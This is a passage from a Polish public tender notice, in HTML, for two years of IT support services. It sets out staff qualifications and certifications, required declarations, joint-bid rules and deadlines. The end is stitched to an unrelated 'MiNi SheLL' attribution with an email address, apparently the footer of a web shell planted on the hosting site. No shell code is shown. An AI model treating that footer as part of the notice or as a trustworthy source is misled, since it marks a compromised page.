wymagania musi spełnić zespół minimum 5 osobowy.<br/>Tym samym dopuszcza Zamawiający łączenie powyższych specjalizacji. <br/><br/>	co najmniej 3 osoby z listy powyżej, z przewidzianych do realizacji usługi w ramach zespołu Wykonawcy muszą posiadać wykształcenie wyższe informatyczne – tj. tytuł zawodowy inżyniera, magistra lub magistra inżyniera uzyskany na kierunku informatyka lub kierunków pokrewnych takich jak teleinformatyka, elektronika i telekomunikacja, cyberbezpieczeństwo, inżynieria systemów informatycznych lub innym kierunku, o ile program studiów obejmował zagadnienia z zakresu informatyki;<br/>	co najmniej 3 osoby, z listy powyżej, z przewidzianych do realizacji usługi w ramach zespołu Wykonawcy muszą posiadać co najmniej 5 lat doświadczenia zawodowego w zakresie technologii informatycznych oraz w obszarze obsługi klienta serwisowego;<br/>	co najmniej jedna osoba, z listy powyżej, z zespołu musi być dedykowanym specjalistą w zakresie administracji bazami danych Oracle, posiadający udokumentowane doświadczenie w zarządzaniu środowiskami Oracle Database w wersjach Enterprise oraz Standard Edition;<br/><br/>	Wymagane jest aby, co najmniej 3 osoby przewidziane do realizacji usługi, z listy powyżej, w ramach zespołu Wykonawcy posiadały wiedzę ekspercką potwierdzoną aktualnym certyfikatem, w co najmniej jednej z poniższych dziedzin tj. min. 3 osoby spełnią warunek jak przedstawią 3 różne dziedziny z listy poniżej, po 1 certyfikacie każda:<br/>o	Dzidzina: administracja systemami operacyjnymi: Red Hat Certified System Administrator (RHCSA) lub Microsoft Certified: Windows Server Administrator,<br/>o	Dziedzina: zarządzanie tożsamością i usługami katalogowymi: Microsoft Certified: Identity and Access Administrator,<br/>o	Dziedzina: administracja bazami danych: PostgreSQL Certified Professional,<br/>o	Dziedzina: wirtualizacja: VMware Certified Professional – Data Center Virtualization (VCP-DCV) lub Microsoft Certified: Windows Server Hybrid Administrator Associate (Hyper-V),<br/>o	Dziedzina: automatyzacja i monitorowanie: Red Hat Certified Specialist in Ansible Automation,<br/>o	Dziedzina: bezpieczeństwo IT: CompTIA Security+, CISSP (Certified Information Systems Security rofessional).<br/><br/>W przypadku posiadania przez Wykonawcę w zasobach kadrowych specjalistę o innych eksperckich umiejętnościach potwierdzonymi innymi certyfikatami, nie wskazanymi powyżej, należy złożyć zapytanie o dopuszczenie niniejszego certyfikatu w ramach doświadczenia, w zapytaniu odnośnie treści SWZ do Zamawiającego, w ustawowym terminie.<br/><br/>Cały zespół Wykonawcy tj. min. 5 osób, musi łącznie posiadać kompetencje umożliwiające realizację pełnego zakresu usług określonych w SOPZ. Zamawiający wymaga na spełnienie warunku przedstawienie wykazu osób, zgodnie z rozporządzeniem jakie podmiotowe środki może żądać Zamawiający w postępowaniu o udzielenie zamówienia publicznego.. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku<br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r.. poz. 594 ), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie<br/>do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej –<br/>załącznik nr 4 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług na spełnienie warunku nr 1, wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usług zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usług zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usług zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego<br/>nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - załącznik nr 8 do SWZ;<br/><br/>Wykaz osób na spełnienie warunku nr 2, - załącznik nr 9 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie żąda. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wykonawca zobowiązany jest załączyć do oferty następujące dokumenty: <br/>1)	Formularz ofertowy (według załączonego wzoru – Załącznik nr 1 do SWZ). <br/>2)	oświadczenie sankcyjne– w przypadku niniejszego postepowania oświadczenie sankcyjne jest zawarte w oświadczeniu na podstawie art. 125 ust. 1 ustawy Pzp.<br/>3)	oświadczenie o podziale obowiązków w trakcie realizacji zamówienia Wykonawców wspólnie ubiegających się o udzielenie zamówienia (według załączonego wzoru – Załącznik nr 5 do SWZ - jeżeli dotyczy usług.<br/>Wymagana forma:<br/>Wykonawcy składają oświadczenia w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym, podpisem zaufanym, podpisem osobistym przez osoby upoważnione do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub w innym dokumencie.<br/>W przypadku gdy oświadczenie zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym, podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, dokonuje odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o udzielenie zamówienia lub notariusz.<br/>4)	Zamawiający nie wymaga przedłożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>5)	Oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (jeżeli Wykonawca zastrzega takie informacje) – jeżeli dotyczy; <br/>Wymagana forma:<br/>Wykonawcy składają oświadczenia w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym, podpisem osobistym, podpisem zaufanym przez osoby upoważnione do reprezentowania wykonawców zgodnie z formą<br/>reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub w innym dokumencie.<br/>W przypadku gdy oświadczenie zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem osobistym, podpisem zaufanym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, dokonuje odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o udzielenie zamówienia lub notariusz.<br/>6)	Pełnomocnictwo, z którego wynika prawo do podpisania oferty oraz do podpisania innych dokumentów składanych wraz z ofertą (jeżeli umocowanie osoby wskazanej w ofercie nie wynika z dokumentów rejestrowych KRS/CEIDG); <br/>7)	pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy – jeżeli dotyczy;<br/>8) Zobowiązanie podmiotu udostępniającego jeśli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego. Umocowanie musi wynikać z treści pełnomocnictwa złożonego wraz z ofertą w oryginale<br/>lub w formie notarialnie potwierdzonego odpisu, podpisanego kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub<br/>podpisem osobistym.<br/>2. Pełnomocnictwo o którym mowa w ust. 1 powinno zawierać w szczególności<br/>wskazanie:<br/>− postępowania o zamówienie publiczne, którego dotyczy;<br/>− wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wymienionych z nazwy z określeniem adresu siedziby;<br/>− ustanowionego Pełnomocnika oraz zakresu jego umocowania. Zakres<br/>umocowania musi obejmować przede wszystkim: reprezentowanie Wykonawców występujących wspólnie w postępowaniu o<br/>udzielenie zamówienia publicznego, zaciąganie w ich imieniu zobowiązań, złożenie oferty wspólnie, prowadzenie<br/>korespondencji i podejmowanie zobowiązań związanych z postępowaniem o zamówienie publiczne.<br/>Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia, w tym pełnomocnika i przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym<br/>rejestrze lub ewidencji Wykonawcy.<br/>3. Wykonawcy działający w ramach spółki cywilnej zamiast pełnomocnictwa, o którym mowa w pkt 1, mogą załączyć do<br/>oferty odpis aktualnej umowy spółki, jeżeli będzie z niej wynikać zakres umocowania wspólników.<br/>4. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie wstępne składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie te potwierdza spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu oraz brak podstaw do wykluczenia.<br/>6. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia<br/>z postępowania, w tym oświadczenie dotyczące przynależności lub braku<br/>przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>7. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument na podstawie art. 125 ust. 1 ustawy<br/>Pzp składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>8. W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający może<br/>zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców,<br/>zgodnie z art. 59 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektowanymi postanowieniami umowy - załącznik nr 7 SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-24 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa Zamawiającego</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-24 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji to okres 24 miesięcy licząc od dnia 14 listopada 2025 r., a jeżeli zawarcie Umowy nastąpi po tej dacie – przez okres 24 miesięcy od dnia zawarcia Umowy.<br/><br/>Wykluczenie nastąpi na podstawie:<br/>− art. 108 ust 1 Ustawy Pzp,<br/>− art. 109 ust. 1 pkt 4, 8, 10 ustawy Pzp,<br/>− art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835)<br/><br/>Zamawiający określa wymagania na podstawie art. 95 ust. 1 ustawy Pzp:<br/>a) opiekuna umowy / klienta, z którym Zamawiający będzie się kontaktował min. 1 osoba,<br/>b) osoba zastępująca opiekuna umowy / klienta – min. 1 osoba,

Creat By MiNi SheLL
Email: jattceo@gmail.com